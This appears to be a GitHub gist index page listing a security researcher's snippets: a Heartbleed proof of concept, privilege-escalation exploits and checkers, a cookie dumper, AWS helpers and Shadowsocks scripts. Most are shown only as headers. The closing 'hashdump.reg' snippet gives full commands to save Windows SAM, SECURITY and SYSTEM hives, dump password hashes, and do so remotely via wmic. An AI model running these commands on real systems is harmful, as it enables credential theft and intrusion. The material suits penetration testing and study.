Skip to content

Instantly share code, notes, and snippets.

sh1n0b1

  • Bishop Fox
Block or report user

Report or block sh1n0b1

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@sh1n0b1
sh1n0b1 / ssltest.py
Created Apr 8, 2014
Python Heartbleed (CVE-2014-0160) Proof of Concept
View ssltest.py
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
@sh1n0b1
sh1n0b1 / linuxprivchecker.py
Created Jul 13, 2015
linuxprivchecker.py -- a Linux Privilege Escalation Check Script
View linuxprivchecker.py
#!/usr/env python
###############################################################################################################
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
##-------------------------------------------------------------------------------------------------------------
## [Details]:
## This script is intended to be executed locally on a Linux box to enumerate basic system info and
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
## passwords and applicable exploits.
View BinaryCookieReader.py
#*******************************************************************************#
# BinaryCookieReader: Written By Satishb3 (http://www.securitylearn.net) #
# #
# For any bug fixes contact me: satishb3@securitylearn.net #
# #
# Usage: Python BinaryCookieReader.py Cookie.Binarycookies-FilePath #
# #
# Safari browser and iOS applications store the persistent cookies in a binary #
# file names Cookies.binarycookies.BinaryCookieReader is used to dump all the #
# cookies from the binary Cookies.binarycookies file. #
@sh1n0b1
sh1n0b1 / elevator.c
Created Jul 24, 2015
Windows Open Type ‘atmfd.dll’ Privilege Escalation MS15-078
View elevator.c
#include <stdio.h>
#include <string.h>
#include "lib.h"
#include <Wininet.h>
//#include "starter.h"
//include OTF
#include "font.h" // foofont is fetched from loader config struct
//#include "cert.h"
@sh1n0b1
sh1n0b1 / s3.sh
Last active May 21, 2019
AWS S3 basic operations via AWS Access Key & Session Token
View s3.sh
# You don't need Fog in Ruby or some other library to upload to S3 -- shell works perfectly fine
# This is how I upload my new Sol Trader builds (http://soltrader.net)
# Based on a modified script from here: http://tmont.com/blargh/2014/1/uploading-to-s3-in-bash
# ====================================================================================
# Aug 25, 2016 sh1n0b1
# Modified this script to support AWS session token
# More work will be done on this.
#
# S3KEY="ASIAJLFN####################"
View FederatedLogin.py
# Original source code: https://docs.aws.amazon.com/en_us/IAM/latest/UserGuide/id_roles_providers_enable-console-custom-url.html
import urllib, json
import requests
access_key = ''
secret_key = ''
session_token = ''
json_string_with_temp_credentials = '{'
json_string_with_temp_credentials += '"sessionId":"' + access_key + '",'
@sh1n0b1
sh1n0b1 / urldecode.sh
Created Mar 1, 2019
URL decode one-liner command
View urldecode.sh
alias urldecode='python -c "import sys, urllib as ul; print ul.unquote_plus(sys.argv[1])"'
@sh1n0b1
sh1n0b1 / outline.sh
Last active Feb 23, 2019
Parse Shaodowsocks Config and encoded it to an Outline Shadowsocks URI
View outline.sh
# Ensure jq 1.5 or greater is installed on your linux system
# ex. apt-get install jq or https://stackoverflow.com/questions/36462955/upgrading-jq-to-1-5-on-ubuntu?answertab=votes#tab-top
#
# If you have a single port/password config like the following:
# {
# "server":"my_server_ip",
# "server_port":8388,
# "local_address": "127.0.0.1",
# "local_port":1080,
# "password":"mypassword",
@sh1n0b1
sh1n0b1 / shadowsocks.sh
Last active Jan 31, 2019
Shadowsocks Server deployment script for Debian 9 - Tools to bypass internet censorship
View shadowsocks.sh
#!/bin/bash
#===============================================================================================
# System Required: Debian 9
# Description: Shadowsocks Server deployment script for Debian 9
# Author: https://github.com/sh1n0b1
#===============================================================================================
apt update
apt install -y curl sudo
sudo apt install -y shadowsocks-libev
sudo systemctl start shadowsocks-libev
@sh1n0b1
sh1n0b1 / hashdump.reg
Last active Nov 7, 2018
Windows local Hash Dump
View hashdump.reg
reg.exe save hklm\sam c:\temp\sam.save
reg.exe save hklm\security c:\temp\security.save
reg.exe save hklm\system c:\temp\system.save
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
#https://github.com/CoreSecurity/impacket/blob/master/examples/secretsdump.py
#Do this remotely
wmic /node:"<computer_name>" /user:"<username>" /password:"<password>" process call create "cmd.exe /c reg save hklm\sam C:\temp\sam.save"
You can’t perform that action at this time.